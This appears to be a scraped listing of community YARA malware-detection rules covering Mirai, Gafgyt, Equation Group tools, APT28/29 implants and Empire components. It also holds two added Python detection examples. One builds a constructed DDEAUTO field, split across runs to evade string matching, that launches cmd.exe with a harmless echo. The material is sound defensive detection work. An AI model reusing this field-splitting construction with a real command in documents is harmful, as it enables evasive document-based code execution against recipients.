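            raw = base64.b64decode(re.sub(rb"\s+", b"", data.group(1)), validate=True)
        except ValueError:
            continue
        if raw.startswith(OLE_MAGIC) or raw.startswith(ZIP_MAGIC):
            hits.append(name.group(1).decode())
    return hits


# --- Constructed samples (not real malware) ---------------------------------------------
def _build_docx(body_xml: str) -> bytes:
    """Minimal .docx containing only the parts the check above reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   f"<w:body>{body_xml}</w:body></w:document>")
    return buf.getvalue()


# DDEAUTO keyword deliberately split over two runs; the command is a harmless echo.
DDE_DOCX = _build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDEA</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">UTO c:\\windows\\system32\\cmd.exe "/c echo hello" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')
BENIGN_DOCX = _build_docx('<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>')

FLAT_OPC_XML = (
    b'<?xml version="1.0" standalone="yes"?>\n' + MSO_WORD_PI + b"\n"
    b'<pkg:package xmlns:pkg="http://schemas.microsoft.com/office/2006/xmlPackage">'
    b'<pkg:part pkg:name="/word/document.xml" pkg:contentType="application/xml">'
    b"<pkg:xmlData><w:document/></pkg:xmlData></pkg:part>"
    b'<pkg:part pkg:name="/word/embeddings/oleObject1.bin" '
    b'pkg:contentType="application/vnd.openxmlformats-officedocument.oleObject">'
    b"<pkg:binaryData>" + base64.b64encode(OLE_MAGIC + b"\x00" * 24) + b"</pkg:binaryData>"
    b"</pkg:part></pkg:package>")

if __name__ == "__main__":
    print("DDE sample:", has_dde_field(DDE_DOCX), "benign:", has_dde_field(BENIGN_DOCX))
    print("Flat OPC embedded parts:", flat_opc_embedded_parts(FLAT_OPC_XML))
```

Joining the run texts with an empty string is the detail that matters: a plain substring search for "DDEAUTO" in document.xml misses the split-run sample, which is exactly why string-only YARA rules for DDE are weak against trivially obfuscated documents. On the Flat OPC side, checking the decoded bytes rather than the declared pkg:contentType catches parts whose content type was relabelled.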
Linux.Helios
yara low
Yara-Rules source

Linux.Helios

community
Emotets
yara low
Yara-Rules source

Emotets

community
Yara-Rules source

Detects malicious files related to CVE-2017-8759

communityexploit
Yara-Rules source

Detects malicious RTF file related CVE-2017-8759

communityexploit
Yara-Rules source

Detects malicious files related to CVE-2017-8759 - file Doc1.doc

communityexploit
Yara-Rules source

Detects malicious files related to CVE-2017-8759 - file cmd.hta

communityexploit
Yara-Rules source

Detects malicious file related to CVE-2017-8759 - file exploit.txt

communityexploit
Yara-Rules source

Detects SOAP WSDL download via JavaScript

community
Yara-Rules source

Linux.Bew Backdoor

backdoorcommunity
Yara-Rules source

The YARA rule 'Industroyer_Malware_1' detects Industroyer-related malware,

community
Yara-Rules source

Detects Industroyer related malware

community
Yara-Rules source

Detects Industroyer related malware

community
Yara-Rules source

Detects Industroyer related malware

community
Yara-Rules source

Detects Industroyer related custom port scanner

community
Yara-Rules source

This YARA rule detects output files generated by Industroyer's custom port scanner, indicating potential reconnaissance activity. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify suspicious network scanning behavior.

community
LuaBot
yara low
Yara-Rules source

LuaBot

community
Yara-Rules source

This rule was written to hit on specific variables and PowerShell command fragments as seen in the macro found in the XLSX file 3a1dca21bfe72368f2dd46eb4d9b48c4.

communitypowershell
Yara-Rules source

The FE_LEGALSTRIKE_MACRO rule detects macros using a specific encoding pattern associated with the sample 30f149479c02b74

community
Yara-Rules source

RTF phishing campaign leveraging the CVE-2017-0199 exploit, pointing to the domain 2bunnyDOTcom

communityexploitphishing
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Gafgyt Trojan
yara low
Yara-Rules source

Gafgyt Trojan

backdoorcommunity
Yara-Rules source

Hajime Botnet - ARM5

community
Yara-Rules source

Hajime Botnet - Downloader

community
Yara-Rules source

Hajime Botnet - generic arch

community
Yara-Rules source

Hajime Botnet - MIPS

community
Yara-Rules source

Hajime Botnet - SH4

community
Yara-Rules source

Detects output generated by EQGRP scanner.exe

backdoorcommunity
Mirai Variant 1
yara low
Yara-Rules source

Mirai Variant 1

community
Mirai Variant 2
yara low
Yara-Rules source

Mirai Variant 2

community
Mirai Variant 3
yara low
Yara-Rules source

Mirai Variant 3

community
Mirai Variant 4
yara low
Yara-Rules source

Mirai Variant 4

community
Mirai Variant 5
yara low
Yara-Rules source

Mirai Variant 5

community
Mirai Downloader
yara low
Yara-Rules source

Mirai Downloader

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Detects EquationGroup Tool - April Leak

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool set

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file calserver

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file cmsd

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file cmsex

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file cryptTool

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file DUL

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file dumppoppy

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file ebbisland

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file eggbasket

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file electricslide

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file elgingamble

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file emptycriss

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file envisioncollision

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file envoytomato

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file estesfox

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1

backdoorcommunity
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file ewok

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file exze

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file jackpop

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file jparsescan

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file jscan

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8

communityexploit
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file packrat

backdoorcommunity
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file parsescan

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file porkclient

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file porkserver

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file promptkill

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file ratload

backdoorcommunity
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file sambal

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file scanner

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file scripme

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file slugger2

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file smash

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file sshobo

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file telex

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file tnmunger

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file xspy

community
Yara-Rules source

Equation Group hack tool leaked by ShadowBrokers- file ys.auto

community
Yara-Rules source

The YARA rule '

backdoorcommunity
Yara-Rules source

Rule to detect Moonlight Maze 'cle' log cleaning tool

community
Yara-Rules source

Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool

community
Yara-Rules source

Rule to detect Moonlight Maze encrypted keylogger logs

communityinfostealer
Yara-Rules source

Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers

communityexploit
Yara-Rules source

Rule to detect log cleaners based on utclean.c

community
Yara-Rules source

Rule to detect log cleaner based on wipe.c

community
Yara-Rules source

Rule to detect Moonlight Maze 'xk' keylogger

communityinfostealer
Yara-Rules source

Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */

community
Yara-Rules source

This YARA rule detects Moonlight Maze Loki malware samples by identifying custom attacker-authored strings associated with the threat group. SOC teams should deploy this rule on endpoint

community
Yara-Rules source

Rule to detect Moonlight Maze sniffer tools

community
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

Downrage Implant by APT28

aptcommunity
Yara-Rules source

CozyDuke / CozyCar / CozyBear Implant by APT29

aptcommunity
Yara-Rules source

CozyDuke / CozyCar / CozyBear Implant by APT29

aptcommunity
Yara-Rules source

Mini Duke Implant by APT29

aptcommunity
Yara-Rules source

Cosmic Duke Implant by APT29

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

CORESHELL/SOURFACE Implant by APT28

aptcommunity
Yara-Rules source

X-Agent/CHOPSTICK Implant by APT28

aptcommunity
Yara-Rules source

X-Agent/CHOPSTICK Implant by APT28

aptcommunity
Yara-Rules source

X-Agent/CHOPSTICK Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

Detects the BlackEnergy/V

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

Detects the

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
Yara-Rules source

BlackEnergy / Voodoo Bear Implant by APT28

aptcommunity
XTunnel Implant by APT28
yara critical
Yara-Rules source

XTunnel Implant by APT28

aptcommunity
XTunnel Implant by APT28
yara critical
Yara-Rules source

XTunnel Implant by APT28

aptcommunity
XTunnel Implant by APT28
yara critical
Yara-Rules source

XTunnel Implant by APT28

aptcommunity
XTunnel Implant by APT28
yara critical
Yara-Rules source

XTunnel Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Yara-Rules source

Sednit / EVILTOSS Implant by APT28

aptcommunity
Implant 7 by APT29
yara critical
Yara-Rules source

Implant 7 by APT29

aptcommunity
Yara-Rules source

HAMMERTOSS / HammerDuke Implant by APT29

aptcommunity
Yara-Rules source

HAMMERTOSS / HammerDuke Implant by APT29

aptcommunity
Yara-Rules source

Onion Duke Implant by APT29

aptcommunity
Yara-Rules source

Unidentified Implant by APT29

aptcommunity
Yara-Rules source

Detects Malware from Greenbug Incident

community
Yara-Rules source

Detects Backdoor from Greenbug Incident

backdoorcommunity
Yara-Rules source

The YARA rule 'Greenbug_Malware_3' detects a backdoor associated with the Greenbug incident, targeting system access and data

backdoorcommunity
Yara-Rules source

Detects ISMDoor Backdoor

backdoorcommunity
Yara-Rules source

Auto-generated rule - from files 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f, 44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49, 7f16824e7ad9ee1ad2debca2a22413cde08

backdoorcommunity
Yara-Rules source

Detects strings derived from the ShadowBrokers leak of Windows tools/exploits

communityexploit
Yara-Rules source

Auto-generated rule - file HRDG022184_certclint.dll

backdoorcommunity
Yara-Rules source

Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0

backdoorcommunity
Yara-Rules source

Mirai Botnet TR-069 Worm - ARM LSB

community
Yara-Rules source

Mirai Botnet TR-069 Worm - Generic Architecture

community
Yara-Rules source

Mirai Botnet TR-069 Worm - MIPS LSB

community
Yara-Rules source

Mirai Botnet TR-069 Worm - MIPS MSB

community
Yara-Rules source

Mirai Botnet TR-069 Worm - PowerPC or Cisco 4500

community
Yara-Rules source

Mirai Botnet TR-069 Worm - Renesas SH LSB

community
Yara-Rules source

Mirai Botnet TR-069 Worm - SPARC MSB

community
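
The Mirai TR-069 worm entries above, like the Hajime (ARM5, MIPS, SH4) and Linux/Httpsd (i686, ARMv5) entries earlier, exist once per target architecture because the same bot is cross-compiled for each. As an added example that is not part of this page or of the Yara-Rules repository, the Python below does the triage step those rule names imply: it reads the ELF identification bytes and e_machine, labels constructed sample headers the way the rule names do, and emits the YARA header condition that pins a rule to one architecture and byte order. The sample headers are synthetic 24-byte prefixes, not real bot samples.

```python
"""Architecture triage for multi-platform ELF IoT bot samples, as an added illustration of
why the rules above come in per-architecture variants. Reads only the ELF identification
bytes and e_machine, and emits the equivalent YARA header condition."""
import struct
from collections import Counter
from typing import Dict, Optional, Tuple

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification for the platforms named in the rules above.
E_MACHINE = {2: "SPARC", 3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM",
             42: "Renesas SH", 43: "SPARC V9", 62: "x86-64", 183: "AArch64"}


def elf_arch(data: bytes) -> Optional[Tuple[str, str, int]]:
    """(architecture, 'LSB'|'MSB', 32|64) for an ELF image, or None if it is not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    # e_machine sits at offset 18 and is stored in the file's own byte order.
    (e_machine,) = struct.unpack_from("<H" if ei_data == 1 else ">H", data, 18)
    return (E_MACHINE.get(e_machine, f"unknown(0x{e_machine:x})"),
            "LSB" if ei_data == 1 else "MSB",
            32 if ei_class == 1 else 64)


def yara_header_condition(e_machine: int, msb: bool) -> str:
    """YARA condition for 'ELF of this machine and endianness'. uint32(0) reads little-endian,
    so the magic 7f 45 4c 46 compares as 0x464C457F; uint16be avoids swapping for MSB files."""
    read16 = "uint16be" if msb else "uint16"
    return (f"uint32(0) == 0x464C457F and uint8(5) == {2 if msb else 1} "
            f"and {read16}(18) == 0x{e_machine:04X}")


def triage(samples: Dict[str, bytes]) -> Dict[str, str]:
    """Map sample name -> 'ARCH ORDER' label (or 'not-ELF'), the way the rule names above do."""
    out = {}
    for name, data in samples.items():
        info = elf_arch(data)
        out[name] = f"{info[0]} {info[1]}" if info else "not-ELF"
    return out


def make_elf_header(e_machine: int, lsb: bool, bits: int = 32) -> bytes:
    """Constructed 24-byte ELF prefix (e_ident, e_type=ET_EXEC, e_machine, e_version) used
    as stand-in sample input; no real malware bytes are included."""
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1 if lsb else 2, 1]) + b"\x00" * 9
    return ident + struct.pack(("<" if lsb else ">") + "HHI", 2, e_machine, 1)


# Constructed sample set; file names mimic the per-arch naming bot droppers use.
SAMPLES = {
    "bot.arm": make_elf_header(40, lsb=True),
    "bot.mips": make_elf_header(8, lsb=False),
    "bot.mpsl": make_elf_header(8, lsb=True),
    "bot.sh4": make_elf_header(42, lsb=True),
    "bot.ppc": make_elf_header(20, lsb=False),
    "bot.spc": make_elf_header(2, lsb=False),
    "bot.x86": make_elf_header(3, lsb=True),
    "notes.txt": b"MZ this is not an ELF file",
}

if __name__ == "__main__":
    labels = triage(SAMPLES)
    for name, label in labels.items():
        print(f"{name:10} {label}")
    print(Counter(labels.values()))
    print(yara_header_condition(8, msb=True))   # condition for a 'MIPS MSB' variant rule
```

The point of the uint16 versus uint16be distinction is that YARA's integer accessors always read little-endian unless the be-suffixed form is used, so a MIPS MSB rule written with uint16(18) == 0x0008 silently never matches; this is a common mistake when cloning an LSB rule for the big-endian variant of the same bot.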
Yara-Rules source

HackingTeam Android implant, known to detect versions v4 - v7

community
Yara-Rules source

Detects Empire component - from files agent.ps1, agent.ps1

community
Yara-Rules source

Detects Empire component - file dumpCredStore.ps1

community
Yara-Rules source

Detects Empire component - file Exploit-JBoss.ps1

communityexploit
Yara-Rules source

Detects Empire component - file Exploit-Jenkins.ps1

communityexploit
Yara-Rules source

Detects Empire component - file Get-GPPPassword.ps1

community
Yara-Rules source

Detects Empire component - file Get-Keystrokes.ps1

community
Yara-Rules source

Detects Empire component - file Get-SecurityPackages.ps1

community
Yara-Rules source

Detects Empire component - file Install-SSP.ps1

community
Yara-Rules source

Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1

communitycredential-theft
Yara-Rules source

Detects Empire component - file Invoke-DllInjection.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-EgressCheck.ps1

community
Yara-Rules source

Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1

community
Yara-Rules source

Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-MetasploitPayload.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-Mimikatz.ps1

communitycredential-theft
Yara-Rules source

